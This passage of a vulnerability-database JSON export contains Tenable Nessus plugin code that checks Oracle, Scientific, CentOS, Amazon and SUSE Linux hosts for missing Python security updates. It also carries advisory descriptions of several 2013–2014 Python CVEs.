value:\"p-cpe:/a:oracle:linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"python-2.6.6-64.0.1.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"python-devel-2.6.6-64.0.1.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"python-libs-2.6.6-64.0.1.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"python-test-2.6.6-64.0.1.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"python-tools-2.6.6-64.0.1.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"tkinter-2.6.6-64.0.1.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python / python-devel / python-libs / python-test / python-tools / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-18T02:47:21", "description": "It was discovered that the socket.recvfrom_into() function failed to\ncheck the size of the supplied buffer. This could lead to a buffer\noverflow when the function was called with an insufficiently sized\nbuffer. (CVE-2014-1912)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)", "edition": 15, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-08-04T00:00:00", "title": "Scientific Linux Security Update : python on SL6.x i386/x86_64 (20150722)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912", "CVE-2014-7185", "CVE-2013-1752", "CVE-2014-4650"], "modified": "2015-08-04T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:python-test", "p-cpe:/a:fermilab:scientific_linux:python", "p-cpe:/a:fermilab:scientific_linux:python-debuginfo", "p-cpe:/a:fermilab:scientific_linux:python-tools", "p-cpe:/a:fermilab:scientific_linux:python-devel", "p-cpe:/a:fermilab:scientific_linux:python-libs", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:tkinter"], "id": "SL_20150722_PYTHON_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/85206", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85206);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/02/27\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2014-1912\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n\n script_name(english:\"Scientific Linux Security Update : python on SL6.x i386/x86_64 (20150722)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the socket.recvfrom_into() function failed to\ncheck the size of the supplied buffer. This could lead to a buffer\noverflow when the function was called with an insufficiently sized\nbuffer. (CVE-2014-1912)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1508&L=scientific-linux-errata&F=&S=&P=3564\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?15a4252d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"python-2.6.6-64.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"python-debuginfo-2.6.6-64.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"python-devel-2.6.6-64.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"python-libs-2.6.6-64.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"python-test-2.6.6-64.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"python-tools-2.6.6-64.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"tkinter-2.6.6-64.el6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python / python-debuginfo / python-devel / python-libs / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-01T05:17:50", "description": "Updated python packages that fix multiple security issues, several\nbugs and add one enhancement are now available for Red Hat Enterprise\nLinux 6.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming\nlanguage often compared to Tcl, Perl, Scheme, or Java. Python includes\nmodules, classes, exceptions, very high level dynamic data types and\ndynamic typing. Python supports interfaces to many system calls and\nlibraries, as well as to various windowing systems (X11, Motif, Tk,\nMac and MFC).\n\nIt was discovered that the socket.recvfrom_into() function failed to\ncheck the size of the supplied buffer. This could lead to a buffer\noverflow when the function was called with an insufficiently sized\nbuffer. (CVE-2014-1912)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nThese updated python packages also include numerous bug fixes and\nenhancements. Space precludes documenting all of these changes in this\nadvisory. For information on the most significant of these changes,\nusers are directed to the following article on the Red Hat Customer\nPortal :\n\nhttps://access.redhat.com/articles/1495363\n\nAll python users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add this\nenhancement.", "edition": 21, "published": "2015-07-28T00:00:00", "title": "CentOS 6 : python (CESA-2015:1330)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912", "CVE-2014-7185", "CVE-2013-1752", "CVE-2014-4650"], "modified": "2020-11-02T00:00:00", "cpe": ["p-cpe:/a:centos:centos:tkinter", "cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:python-devel", "p-cpe:/a:centos:centos:python", "p-cpe:/a:centos:centos:python-test", "p-cpe:/a:centos:centos:python-libs", "p-cpe:/a:centos:centos:python-tools"], "id": "CENTOS_RHSA-2015-1330.NASL", "href": "https://www.tenable.com/plugins/nessus/85012", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1330 and \n# CentOS Errata and Security Advisory 2015:1330 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85012);\n script_version(\"2.3\");\n script_cvs_date(\"Date: 2018/07/02 18:48:53\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2014-1912\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_bugtraq_id(63804, 65379, 68147, 70089);\n script_xref(name:\"RHSA\", value:\"2015:1330\");\n\n script_name(english:\"CentOS 6 : python (CESA-2015:1330)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated python packages that fix multiple security issues, several\nbugs and add one enhancement are now available for Red Hat Enterprise\nLinux 6.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming\nlanguage often compared to Tcl, Perl, Scheme, or Java. Python includes\nmodules, classes, exceptions, very high level dynamic data types and\ndynamic typing. Python supports interfaces to many system calls and\nlibraries, as well as to various windowing systems (X11, Motif, Tk,\nMac and MFC).\n\nIt was discovered that the socket.recvfrom_into() function failed to\ncheck the size of the supplied buffer. This could lead to a buffer\noverflow when the function was called with an insufficiently sized\nbuffer. (CVE-2014-1912)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nThese updated python packages also include numerous bug fixes and\nenhancements. Space precludes documenting all of these changes in this\nadvisory. For information on the most significant of these changes,\nusers are directed to the following article on the Red Hat Customer\nPortal :\n\nhttps://access.redhat.com/articles/1495363\n\nAll python users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add this\nenhancement.\"\n );\n # http://lists.centos.org/pipermail/centos-cr-announce/2015-July/001906.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?215fca08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n# Temp disable\nexit(0, 'Temporarily disabled.');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"python-2.6.6-64.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"python-devel-2.6.6-64.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"python-libs-2.6.6-64.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"python-test-2.6.6-64.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"python-tools-2.6.6-64.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"tkinter-2.6.6-64.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T22:47:00", "description": "An integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthose arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash.\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive\namount of memory.\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose source of\nscripts in the cgi-bin directory.", "edition": 13, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-12-15T00:00:00", "title": "Amazon Linux AMI : python26 (ALAS-2015-621)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7185", "CVE-2013-1752", "CVE-2014-4650"], "modified": "2015-12-15T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:python26-debuginfo", "p-cpe:/a:amazon:linux:python26", "p-cpe:/a:amazon:linux:python26-libs", "p-cpe:/a:amazon:linux:python26-test", "p-cpe:/a:amazon:linux:python26-tools", "cpe:/o:amazon:linux", "p-cpe:/a:amazon:linux:python26-devel"], "id": "ALA_ALAS-2015-621.NASL", "href": "https://www.tenable.com/plugins/nessus/87347", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-621.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87347);\n script_version(\"2.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/02/27\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_xref(name:\"ALAS\", value:\"2015-621\");\n\n script_name(english:\"Amazon Linux AMI : python26 (ALAS-2015-621)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthose arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash.\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive\namount of memory.\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose source of\nscripts in the cgi-bin directory.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-621.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update python26' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python26-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python26-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python26-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python26-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python26-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"python26-2.6.9-2.83.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python26-debuginfo-2.6.9-2.83.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python26-devel-2.6.9-2.83.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python26-libs-2.6.9-2.83.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python26-test-2.6.9-2.83.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python26-tools-2.6.9-2.83.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python26 / python26-debuginfo / python26-devel / python26-libs / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T18:36:55", "description": "This update to python 2.7.9 fixes the following issues :\n\n - python-2.7-libffi-aarch64.patch: Fix argument passing in\n libffi for aarch64\n\nFrom the version update to 2.7.9 :\n\n - contains full backport of ssl module from Python 3.4\n (PEP466)\n\n - HTTPS certificate validation enabled by default (PEP476)\n\n - SSLv3 disabled by default (bnc#901715)\n\n - backported ensurepip module (PEP477)\n\n - fixes several missing CVEs from last release:\n CVE-2013-1752, CVE-2013-1753\n\n - dropped upstreamed patches: python-2.7.6-poplib.patch,\n smtplib_maxline-2.7.patch, xmlrpc_gzip_27.patch\n\n - dropped patch python-2.7.3-ssl_ca_path.patch because we\n don't need it with ssl module from Python 3\n\n - libffi was upgraded upstream, seems to contain our\n changes, so dropping libffi-ppc64le.diff as well\n\n - python-2.7-urllib2-localnet-ssl.patch - properly remove\n unconditional 'import ssl' from test_urllib2_localnet\n that caused it to fail without ssl\n\n - skip test_thread in qemu_linux_user mode\n\nFrom the version update to 2.7.8 :\n\n - fixes CVE-2014-4650 directory traversal in CGIHTTPServer\n\n - fixes CVE-2014-7185 (bnc#898572) potential buffer\n overflow in buffer()\n\nAlso the DH parameters were increased to 2048 bit to fix logjam\nsecurity issue (bsc#935856)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 16, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-08-06T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : python (SUSE-SU-2015:1344-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2013-1752", "CVE-2014-4650"], "modified": "2015-08-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libpython2_7", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:python-base-debugsource", "p-cpe:/a:novell:suse_linux:python-gdbm", "p-cpe:/a:novell:suse_linux:python", "p-cpe:/a:novell:suse_linux:python-xml-debuginfo", "p-cpe:/a:novell:suse_linux:python-devel", "p-cpe:/a:novell:suse_linux:python-curses-debuginfo", "p-cpe:/a:novell:suse_linux:python-base", "p-cpe:/a:novell:suse_linux:libpython2_7-1_0", "p-cpe:/a:novell:suse_linux:python-tk", "p-cpe:/a:novell:suse_linux:python-base-debuginfo", "p-cpe:/a:novell:suse_linux:python-demo", "p-cpe:/a:novell:suse_linux:python-curses", "p-cpe:/a:novell:suse_linux:python-debuginfo", "p-cpe:/a:novell:suse_linux:python-tk-debuginfo", "p-cpe:/a:novell:suse_linux:libpython2_7-1_0-debuginfo", "p-cpe:/a:novell:suse_linux:python-gdbm-debuginfo", "p-cpe:/a:novell:suse_linux:python-debugsource", "p-cpe:/a:novell:suse_linux:python-xml", "p-cpe:/a:novell:suse_linux:python-idle"], "id": 